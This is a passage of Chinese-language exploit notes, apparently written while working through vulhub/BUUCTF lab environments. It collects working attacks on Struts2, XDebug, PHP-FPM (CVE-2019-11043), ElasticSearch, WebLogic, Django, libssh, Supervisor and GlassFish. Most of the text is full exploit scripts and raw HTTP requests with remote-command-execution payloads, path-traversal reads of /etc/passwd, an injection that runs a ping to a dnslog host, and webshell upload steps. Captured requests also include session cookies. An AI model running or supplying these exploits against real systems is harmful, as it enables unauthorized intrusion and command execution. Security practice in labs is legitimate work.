        poolsz = int(sys.argv[3])
    except IndexError:
        pass
    except ValueError, e:
        print "Error with poolsz %d: %s" % (sys.argv[3], e)
        sys.exit(1)

    print "Getting initial offset...",  
    reqphp, tag, reqlfi = setup(host, port)
    offset = getOffset(host, port, reqphp)
    sys.stdout.flush()

    maxattempts = 1000
    e = threading.Event()
    l = threading.Lock()

    print "Spawning worker pool (%d)..." % poolsz
    sys.stdout.flush()

    tp = []
    for i in range(0,poolsz):
        tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))

    for t in tp:
        t.start()
    try:
        #主线程也会判断是否成功写入/tmp/g
        while not e.wait(1):
            if e.is_set():
                break
            with l:
                sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))
                sys.stdout.flush()
                if counter >= maxattempts:
                    break
        print
        if e.is_set():
            print "Woot!  \m/"
        else:
            print ":("
    except KeyboardInterrupt:
        print "\nTelling threads to shutdown..."
        e.set()
    
    print "Shuttin' down..."
    for t in tp:
        t.join()
if __name__=="__main__":
    main()

很尴尬的是我没跑起来，姑且记一下吧，看的文章https://www.cnblogs.com/tr1ple/p/10993110.html

s2-012

影响版本

Struts Showcase App 2.0.0 - Struts Showcase App 2.3.14.2

漏洞利用

POST /user.action HTTP/1.1
Host: node3.buuoj.cn:28023
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 562
Origin: http://node3.buuoj.cn:28023
Connection: close
Referer: http://node3.buuoj.cn:28023/
Cookie: UM_distinctid=176daf6a6745d-0dffedf6acd35-4c3f207e-144000-176daf6a67591d; pma_lang=zh_CN; JSESSIONID=75A6AACC2453C199BC752F5AA28EF570; phpMyAdmin=fb4767a90d17ef096a0d8a855adc604e4406f0c6; pma_collation_connection=utf8_unicode_ci; pma_iv-1=NDgzEy%2B%2BtLdtQ9IKW3T55g%3D%3D; pmaUser-1=Ysr3SyWxkPvfdBWH%2FDEVDA%3D%3D; pma_console_height=92; pma_console_mode=collapse; pma_console_config=%7B%22alwaysExpand%22%3Afalse%2C%22startHistory%22%3Afalse%2C%22currentQuery%22%3Atrue%7D; auto_saved_sql=select%20%22%3C%3Fphp%20phpinfo()%3B%3F%3E%22; pmaPass-1=YMswMhHaJOw%2Bkt%2FFSCiG8w%3D%3D; _xsrf=2|406ca202|6bac99e6054d1f4bdac82277f76c5b44|1615008333
Upgrade-Insecure-Requests: 1

name=%25%7B+%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22env%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C+%23b%3D%23a.getInputStream%28%29%2C+%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C+%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C+%23e%3Dnew+char%5B50000%5D%2C+%23d.read%28%23e%29%2C+%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C+%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C+%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29+%7D

s2-009

影响版本

2.1.0 - 2.3.1.1

漏洞利用

http://node3.buuoj.cn:26930/ajax/example5?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27ls%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]

成功后他会让你下载一个文件，文件内容即为命令的执行结果。

Tomcat8+ Weak Password && Backend Getshell Vulnerability

漏洞成因

tomcat8的管理员设置了弱密码，而管理员后台存在任意文件上传漏洞，导致了命令执行

漏洞利用

进入管理员后台后，将shell.jsp（webshell）压缩成a.zip文件，并把后缀改为.war，上传后访问http://node3.buuoj.cn:27304/a/shell.jsp即可。

[PHP]XDebug RCE

漏洞利用

#!/usr/bin/env python3
import re
import sys
import time
import requests
import argparse
import socket
import base64
import binascii
from concurrent.futures import ThreadPoolExecutor


pool = ThreadPoolExecutor(1)
session = requests.session()
session.headers = {
    'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
}

def recv_xml(sock):
    blocks = []
    data = b''
    while True:
        try:
            data = data + sock.recv(1024)
        except socket.error as e:
            break
        if not data:
            break

        while data:
            eop = data.find(b'\x00')
            if eop < 0:
                break
            blocks.append(data[:eop])
            data = data[eop+1:]

        if len(blocks) >= 4:
            break
    
    return blocks[3]


def trigger(url):
    time.sleep(2)
    try:
        session.get(url + '?XDEBUG_SESSION_START=phpstorm', timeout=0.1)
    except:
        pass


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='XDebug remote debug code execution.')
    parser.add_argument('-c', '--code', required=True, help='the code you want to execute.')
    parser.add_argument('-t', '--target', required=True, help='target url.')
    parser.add_argument('-l', '--listen', default=9000, type=int, help='local port')
    args = parser.parse_args()
    
    ip_port = ('0.0.0.0', args.listen)
    sk = socket.socket()
    sk.settimeout(10)
    sk.bind(ip_port)
    sk.listen(5)

    pool.submit(trigger, args.target)
    conn, addr = sk.accept()
    conn.sendall(b''.join([b'eval -i 1 -- ', base64.b64encode(args.code.encode()), b'\x00']))

    data = recv_xml(conn)
    print('[+] Recieve data: ' + data.decode())
    g = re.search(rb'<\!\[CDATA\[([a-z0-9=\./\+]+)\]\]>', data, re.I)
    if not g:
        print('[-] No result...')
        sys.exit(0)

    data = g.group(1)

    try:
        print('[+] Result: ' + base64.b64decode(data).decode())
    except binascii.Error:
        print('[-] May be not string result...')

重要说明：因为该通信是一个反向连接的过程，exp.py启动后其实是会监听本地的9000端口（可通过-l参数指定）并等待XDebug前来连接，所以执行该脚本的服务器必须有外网IP（或者与目标服务器处于同一内网）。

链接：https://github.com/vulhub/vulhub/tree/master/php/xdebug-rce

nginx解析漏洞

影响版本

所有版本

漏洞成因

用户开启了cgi.fix_pathinfo选项

该项会对文件路径进行“修理”。何谓“修理”？举个例子，当php遇到文件路径“/aaa.xxx/bbb.yyy/ccc.zzz”时，若“/aaa.xxx/bbb.yyy/ccc.zzz”不存在，则会去掉最后的“/ccc.zzz”，然后判断“/aaa.xxx/bbb.yyy”是否存在，若存在，则把“/aaa.xxx/bbb.yyy”当做文件“/aaa.xxx/bbb.yyy/ccc.zzz”，若“/aaa.xxx/bbb.yyy”仍不存在，则继续去掉“/bbb.yyy”，以此类推。

漏洞利用

http://your-ip/aaa.xxx/bbb.php

[PHPUnit]CVE-2017-9841

影响版本

4.8.19 ~ 4.8.27

5.0.10 ~ 5.6.2

漏洞利用

直接将PHP代码作为POST Body发送给http://your-ip:8080/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

[struts2]s2-015

影响版本

2.0.0 - 2.3.14.2

漏洞利用

http://node3.buuoj.cn:27326/$%7B%20%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('env').getInputStream())%7D.action

需要注意的是，命令执行成功后页面返回的状态码是404，但错误信息处为命令执行结果，如图：

apache 解析漏洞

漏洞成因

Apache HTTPD 支持一个文件拥有多个后缀，并为不同后缀执行不同的指令。比如，如下配置文件：

1 2	AddType text/html .html AddLanguage zh-CN .cn

其给.html后缀增加了media-type，值为text/html；给.cn后缀增加了语言，值为zh-CN。此时，如果用户请求文件index.cn.html，他将返回一个中文的html页面。

以上就是Apache多后缀的特性。如果运维人员给.php后缀增加了处理器：

1	AddHandler application/x-httpd-php .php

那么，在有多个后缀的情况下，只要一个文件含有.php后缀的文件即将被识别成PHP文件，没必要是最后一个后缀。利用这个特性，将会造成一个可以绕过上传白名单的解析漏洞。

漏洞利用

白名单绕过

[GlassFish]任意文件读取

影响版本

4.0至4.1

漏洞成因

java会把%c0%ae解析为\uC0AE，最后转义为ASCCII字符的.（点）。实现了目录穿越。

漏洞利用

1	https://node3.buuoj.cn:29132/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

[Django]CVE-2019-14234

影响版本

1.11.x before 1.11.23

2.1.x before 2.1.11

2.2.x before 2.2.4

漏洞利用

登陆后台后，访问该目录（默认密码为admin/a123123123）

1	http://node3.buuoj.cn:25764/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping 3nkw61.dnslog.cn%27--%20

[Postgres]CVE-2019-9193

这个可以和上一个漏洞组合一下，先留着位置，以后写

[Weblogic]CVE-2017-10271

影响版本

10.3.6.0.0，12.1.3.0.0，12.2.1.1.0，12.2.1.2.0

漏洞成因

Weblogic 的 WLS Security 组件对外提供 webservice 服务，其中使用了XMLDecoder 来解析用户传入的 XML 数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。

漏洞利用

访问http://your-ip/wls-wsat/CoordinatorPortType11，存在下图则可能有漏洞

很多位置都可以用：

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

poc

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: node3.buuoj.cn:27290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: UM_distinctid=176daf6a6745d-0dffedf6acd35-4c3f207e-144000-176daf6a67591d; pma_lang=zh_CN; phpMyAdmin=fb4767a90d17ef096a0d8a855adc604e4406f0c6; pma_collation_connection=utf8_unicode_ci; pma_iv-1=NDgzEy%2B%2BtLdtQ9IKW3T55g%3D%3D; pmaUser-1=Ysr3SyWxkPvfdBWH%2FDEVDA%3D%3D; pma_console_height=92; pma_console_mode=collapse; pma_console_config=%7B%22alwaysExpand%22%3Afalse%2C%22startHistory%22%3Afalse%2C%22currentQuery%22%3Atrue%7D; auto_saved_sql=select%20%22%3C%3Fphp%20phpinfo()%3B%3F%3E%22; pmaPass-1=YMswMhHaJOw%2Bkt%2FFSCiG8w%3D%3D; _xsrf=2|406ca202|6bac99e6054d1f4bdac82277f76c5b44|1615008333; csrftoken=13SJomfN01Y2BJzpt8TNBFHYcIqMosKX7xUKgMAIdaIPBOq1Dl5q1ZW8WmxA6jHA; sessionid=k2hmrn51p09i71g5fo444a0qzcdk5uu9
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 666

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
         <java version="1.6.0" class="java.beans.XMLDecoder">
                    <object class="java.io.PrintWriter"> 
                        <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println">
                        <string>monster_test</string></void><void method="close"/>
                    </object>
            </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
</soapenv:Envelope>

执行后返回的状态码为500，这时候我们访问test.txt，出现moonster_test字符即成功，其中wls-wsat的默认根路径为：/root/Oracle/Middleware//user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat/

所以填写servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt，test.txt为写入的文件名，monster_test为写入的内容

也可以用exploit-db的脚本

[Discuz]wooyun-2010-080723

影响版本

Discuz 7.x 6.x

漏洞成因

由于php5.3.x版本里php.ini的设置里request_order默认值为GP，导致$_REQUEST中不再包含$_COOKIE，我们通过在Cookie中传入$GLOBALS来覆盖全局变量，造成代码执行漏洞。

漏洞利用

直接找一个已存在的帖子，向其发送数据包，修改cookie

GET /viewthread.php?tid=12&extra=page%3D1 HTTP/1.1
Host: node3.buuoj.cn:27277
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
Upgrade-Insecure-Requests: 1

[PHP]CVE-2019-11043

影响版本

在 Nginx + PHP-FPM 环境下，当启用了上述 Nginx 配置后，以下 PHP 版本受本次漏洞影响，另外，PHP 5.6版本也受此漏洞影响，但目前只能 Crash，不可以远程代码执行：

PHP 7.0 版本
PHP 7.1 版本
PHP 7.2 版本
PHP 7.3 版本

漏洞成因

CVE-2019-11043 是一个远程代码执行漏洞，使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞，可允许攻击者远程执行代码。

向Nginx + PHP-FPM的服务器 URL发送 %0a 时，服务器返回异常。

该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下：

location ~ [^/]\.php(/|$) {

 ...

 fastcgi_split_path_info ^(.+?\.php)(/.*)$;

 fastcgi_param PATH_INFO $fastcgi_path_info;

 fastcgi_pass   php:9000;

 ...

}

攻击者可以使用换行符（％0a）来破坏fastcgi_split_path_info指令中的Regexp。Regexp被损坏导致PATH_INFO为空，从而触发该漏洞。

漏洞利用

利用这里的脚本：https://github.com/neex/phuip-fpizdam（需要go语言环境）

或者利用这个脚本：

import requests

# author：eth10
# 根据GitHub上面的go语言exp，以及攻击数据包写的对应py3 exp
# 随便改一下就可以批量检测了，检测之前最好确认是nginx+linux+php的环境
# url必须是带有php的文件路径，如：http://192.168.1.11/index.php
# 第一次的话在攻击过程中可以利用，但是结束后可能就不稳定了，建议第一次执行完之后，再执行一次稳定后就可以执行命令了。
# 访问即可执行命令：http://192.168.1.11/index.php?a=ifconfig

url = input("URL：")
url = url.strip()

def one():
    tmplist = []
    headers = {"User-Agent": "Mozilla/5.0",
               "D-Pisos": "8=D",
               "Ebut": "mamku tvoyu"
               }
    for i in range(1499, 1900):
        res = requests.get(url + "/PHP%0Ais_the_shittiest_lang.php?" + "Q" * i, headers=headers)
        if res.status_code == 502:
            tmplist.append(i-10)
            tmplist.append(i-5)
            tmplist.append(i)
            print(f"Status code 502 for qsl={tmplist[0]}, adding as a candidate")
            print(f"The target is probably vulnerable. Possible QSLs: {tmplist}")
            break
    return tmplist


def two():
    tmplist = one()
    if len(tmplist) == 0:
        print('暂未发现漏洞')
        return None
    for i in tmplist:
        for j in range(1, 256):
            headers = {
                "User-Agent": "Mozilla/5.0",
                "D-Pisos": f"8{'='*j}D",
                "Ebut": "mamku tvoyu"
            }
            res = requests.get(url + "/PHP_VALUE%0Asession.auto_start=1;;;?" + "Q" * i, headers=headers)
            if "Set-Cookie" in res.headers:
                # print(i, j, res.headers)
                print('Trying to set "session.auto_start=0"...')
                for t in range(50):
                    res = requests.get(url + "/PHP_VALUE%0Asession.auto_start=0;;;?" + "Q" * i, headers=headers)
                print('Performing attack using php.ini settings...')
                count = 0
                for l in range(1000):
                    res = requests.get(
                        url + "/PHP_VALUE%0Ashort_open_tag=1;;;;;;;?a=/bin/sh+-c+'which+which'&" + "Q" * (i-27),
                        headers=headers)
                    res = requests.get(
                        url + "/PHP_VALUE%0Ahtml_errors=0;;;;;;;;;;?a=/bin/sh+-c+'which+which'&" + "Q" * (i - 27),
                        headers=headers)
                    res = requests.get(
                        url + "/PHP_VALUE%0Ainclude_path=/tmp;;;;;;?a=/bin/sh+-c+'which+which'&" + "Q" * (i - 27),
                        headers=headers)
                    res = requests.get(
                        url + "/PHP_VALUE%0Aauto_prepend_file=a;;;;?a=/bin/sh+-c+'which+which'&" + "Q" * (i - 27),
                        headers=headers)
                    # print('auto_prepend_file=a', res.text)
                    res = requests.get(
                        url + "/PHP_VALUE%0Alog_errors=1;;;;;;;;;;;?a=/bin/sh+-c+'which+which'&" + "Q" * (i - 27),
                        headers=headers)
                    res = requests.get(
                        url + "/PHP_VALUE%0Aerror_reporting=2;;;;;;?a=/bin/sh+-c+'which+which'&" + "Q" * (i - 27),
                        headers=headers)
                    print(l, 'error_reporting=2', res.content)
                    # if "/usr/bin/which" == res.text
                    res = requests.get(
                        url + "/PHP_VALUE%0Aerror_log=/tmp/a;;;;;;;?a=/bin/sh+-c+'which+which'&" + "Q" * (i - 27),
                        headers=headers)
                    res = requests.get(
                        url + "/PHP_VALUE%0Aextension_dir=%22%3C%3F=%60%22;;;?a=/bin/sh+-c+'which+which'&" + "Q" * (i - 27-5),
                        headers=headers)
                    res = requests.get(
                        url + "/PHP_VALUE%0Aextension=%22$_GET%5Ba%5D%60%3F%3E%22?a=/bin/sh+-c+'which+which'&" + "Q" * (
                                    i - 27 - 5-3),
                        headers=headers)
                    if "PHP Warning" in res.text:
                        # print('extension=%22$_GET', res.text)
                        for k in range(5):
                            res = requests.get(
                                url + "/?a=%3Becho+%27%3C%3Fphp+echo+%60%24_GET%5Ba%5D%60%3Breturn%3B%3F%3E%27%3E%2Ftmp%2Fa%3Bwhich+which&" + "Q" * (
                                        i - 97), headers=headers)
                            if "PHP Warning" in res.text:
                                # print('a=%3Becho+%27%3C%3Fphp+echo', res.text)
                                break
                break

two()

1	go run .\detect.go "http://node3.buuoj.cn:28903/"

或

1	python ./cve-2019-11043.py

[ElasticSearch]CVE-2015-1427

影响版本

在1.4.3之前

漏洞利用

首先，向/website/blog插入一条数据，内容随意：

POST /website/blog HTTP/1.1
Host: node3.buuoj.cn:27364
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cache: no-cache
Origin: moz-extension://aefc0119-ee06-403d-91ab-35414d45b0d9
Content-Length: 15
Connection: close
Cookie: UM_distinctid=176daf6a6745d-0dffedf6acd35-4c3f207e-144000-176daf6a67591d; pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; pma_iv-1=NDgzEy%2B%2BtLdtQ9IKW3T55g%3D%3D; pmaUser-1=Ysr3SyWxkPvfdBWH%2FDEVDA%3D%3D; _xsrf=2|406ca202|6bac99e6054d1f4bdac82277f76c5b44|1615008333; csrftoken=13SJomfN01Y2BJzpt8TNBFHYcIqMosKX7xUKgMAIdaIPBOq1Dl5q1ZW8WmxA6jHA; sessionid=k2hmrn51p09i71g5fo444a0qzcdk5uu9; 5H6_sid=0gGS3S; 5H6_visitedfid=2; phpMyAdmin=fb4767a90d17ef096a0d8a855adc604e4406f0c6; pma_console_height=92; pma_console_mode=collapse; pma_console_config=%7B%22alwaysExpand%22%3Afalse%2C%22startHistory%22%3Afalse%2C%22currentQuery%22%3Atrue%7D; auto_saved_sql=select%20%22%3C%3Fphp%20phpinfo()%3B%3F%3E%22; pmaPass-1=YMswMhHaJOw%2Bkt%2FFSCiG8w%3D%3D

{"test":"test"}

，然后向/_search/pretty发送exp即可

POST /_search?pretty HTTP/1.1
Host: node3.buuoj.cn:27364
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cache: no-cache
Origin: moz-extension://aefc0119-ee06-403d-91ab-35414d45b0d9
Content-Length: 157
Connection: close
Cookie: UM_distinctid=176daf6a6745d-0dffedf6acd35-4c3f207e-144000-176daf6a67591d; pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; pma_iv-1=NDgzEy%2B%2BtLdtQ9IKW3T55g%3D%3D; pmaUser-1=Ysr3SyWxkPvfdBWH%2FDEVDA%3D%3D; _xsrf=2|406ca202|6bac99e6054d1f4bdac82277f76c5b44|1615008333; csrftoken=13SJomfN01Y2BJzpt8TNBFHYcIqMosKX7xUKgMAIdaIPBOq1Dl5q1ZW8WmxA6jHA; sessionid=k2hmrn51p09i71g5fo444a0qzcdk5uu9; 5H6_sid=0gGS3S; 5H6_visitedfid=2; phpMyAdmin=fb4767a90d17ef096a0d8a855adc604e4406f0c6; pma_console_height=92; pma_console_mode=collapse; pma_console_config=%7B%22alwaysExpand%22%3Afalse%2C%22startHistory%22%3Afalse%2C%22currentQuery%22%3Atrue%7D; auto_saved_sql=select%20%22%3C%3Fphp%20phpinfo()%3B%3F%3E%22; pmaPass-1=YMswMhHaJOw%2Bkt%2FFSCiG8w%3D%3D

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"env\").getText()"}}}

{
    "size":1,
    "script_fields": {
        "test#": {  
            "script":
                "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"env\").getInputStream())).readLines()",

            "lang": "groovy"
        }
    }

}

1	{"script_fields": {"my_field": {"script": "def command=\"env\";def res=command.execute().text;res","lang":"groovy"}}}

这些exp都行

[Nginx]CVE-2013-4547

影响版本

Nginx 0.8.41至1.4.3版本和1.5.7之前的1.5.x版本

漏洞成因

如果空格和零截断符相邻的话nginx就不会检测到零截断并返回错误了

漏洞利用

在文件上传时，修改文件名的hex编码，在文件末尾插入2000，如图

上传之后，访问该页面并抓包，修改页面的值，在截断后面添加.php，如图：

然后forward，即可成功访问，如图：

更多利用方法可以看这个：http://www.lenky.info/archives/2016/04/2488

[ElasticSearch]CVE-2015-3337

影响版本

1.4.5以下/1.5.2以下

漏洞成因

在安装了具有“site”功能的插件以后，插件目录使用…/即可向上跳转，导致目录穿越漏洞，可读取任意文件。没有安装任意插件的elasticsearch不受影响。

漏洞利用

抓包修改请求：GET /_plugin/head/../../../../../../../../../etc/passwd HTTP/1.1，不抓包的话地址会直接变成/etc/passwd。

[ElasticSearch]CVE-2014-3120

影响版本

1.3之前

漏洞成因

MVEL引擎没有做任何的防护，或者沙盒包装，所以可以直接执行任意代码。

由于在ElasticSearch的默认配置下，动态脚本执行功能处于打开状态，导致用户可以构造恶意的请求包，执行任意代码。

漏洞利用

和CVE-2015-1427一样，先向/website/blog插入数据，然后输入exp即可：

POST /_search?pretty HTTP/1.1
Host: node3.buuoj.cn:25538
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: UM_distinctid=176daf6a6745d-0dffedf6acd35-4c3f207e-144000-176daf6a67591d; pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; pma_iv-1=NDgzEy%2B%2BtLdtQ9IKW3T55g%3D%3D; pmaUser-1=Ysr3SyWxkPvfdBWH%2FDEVDA%3D%3D; _xsrf=2|406ca202|6bac99e6054d1f4bdac82277f76c5b44|1615008333; csrftoken=13SJomfN01Y2BJzpt8TNBFHYcIqMosKX7xUKgMAIdaIPBOq1Dl5q1ZW8WmxA6jHA; sessionid=k2hmrn51p09i71g5fo444a0qzcdk5uu9; 5H6_sid=0gGS3S; 5H6_visitedfid=2; phpMyAdmin=fb4767a90d17ef096a0d8a855adc604e4406f0c6; pma_console_height=92; pma_console_mode=collapse; pma_console_config=%7B%22alwaysExpand%22%3Afalse%2C%22startHistory%22%3Afalse%2C%22currentQuery%22%3Atrue%7D; auto_saved_sql=select%20%22%3C%3Fphp%20phpinfo()%3B%3F%3E%22; pmaPass-1=YMswMhHaJOw%2Bkt%2FFSCiG8w%3D%3D
Upgrade-Insecure-Requests: 1
Content-Length: 359


{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"env\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}

[WebLogic]CVE-2018-2894

影响版本

weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。

漏洞利用

在console处登录后台后(默认密码为weblogic/weblogic)，点击base_domain中的高级(英文为advanced)，如图：

再开启web服务测试页(Enable Web Server Test Page)，保存。

然后访问/ws_utc/config.do将工作目录(Work Home Dir)改为/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css这里很重要，因为访问这个目录是不用权限的。

点击安全->添加，然后上传马。

查看时间戳（抓包查看也可以）

访问/ws_utc/css/config/keystore/[时间戳]_[文件名]即可执行webshell

[Libssh]CVE-2018-10933

影响版本

libssh0.6及以上的版本

漏洞成因

libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。通过向服务端发送SSH2_MSG_USERAUTH_SUCCESS消息来代替服务端期望启动身份验证的SSH2_MSG_USERAUTH_REQUEST消息，攻击者可以在没有任何凭据的情况下成功进行身份验证，甚至可能登陆SSH，入侵服务器

漏洞利用

直接利用exp：

#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

[Supervisor]CVE-2017-11610

影响版本

Supervisor version 3.1.2

Supervisor version 3.3.2

漏洞利用

访问RPC2并传输poc，值得注意的是，该poc没有回显：

POST /RPC2 HTTP/1.1
Host: node3.buuoj.cn:26454
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: UM_distinctid=176daf6a6745d-0dffedf6acd35-4c3f207e-144000-176daf6a67591d; pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; pma_iv-1=NDgzEy%2B%2BtLdtQ9IKW3T55g%3D%3D; pmaUser-1=Ysr3SyWxkPvfdBWH%2FDEVDA%3D%3D; _xsrf=2|406ca202|6bac99e6054d1f4bdac82277f76c5b44|1615008333; csrftoken=13SJomfN01Y2BJzpt8TNBFHYcIqMosKX7xUKgMAIdaIPBOq1Dl5q1ZW8WmxA6jHA; sessionid=k2hmrn51p09i71g5fo444a0qzcdk5uu9; 5H6_sid=0gGS3S; 5H6_visitedfid=2; phpMyAdmin=fb4767a90d17ef096a0d8a855adc604e4406f0c6; pma_console_height=92; pma_console_mode=collapse; pma_console_config=%7B%22alwaysExpand%22%3Afalse%2C%22startHistory%22%3Afalse%2C%22currentQuery%22%3Atrue%7D; auto_saved_sql=select%20%22%3C%3Fphp%20phpinfo()%3B%3F%3E%22; pmaPass-1=YMswMhHaJOw%2Bkt%2FFSCiG8w%3D%3D
Upgrade-Insecure-Requests: 1
Content-Type:application/x-www-form-urlencoded
Content-Length: 198

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>env</string>
</param>
</params>
</methodCall>

强力推荐离别歌大佬的文章

[Drupal]CVE-2018-7602

影响版本

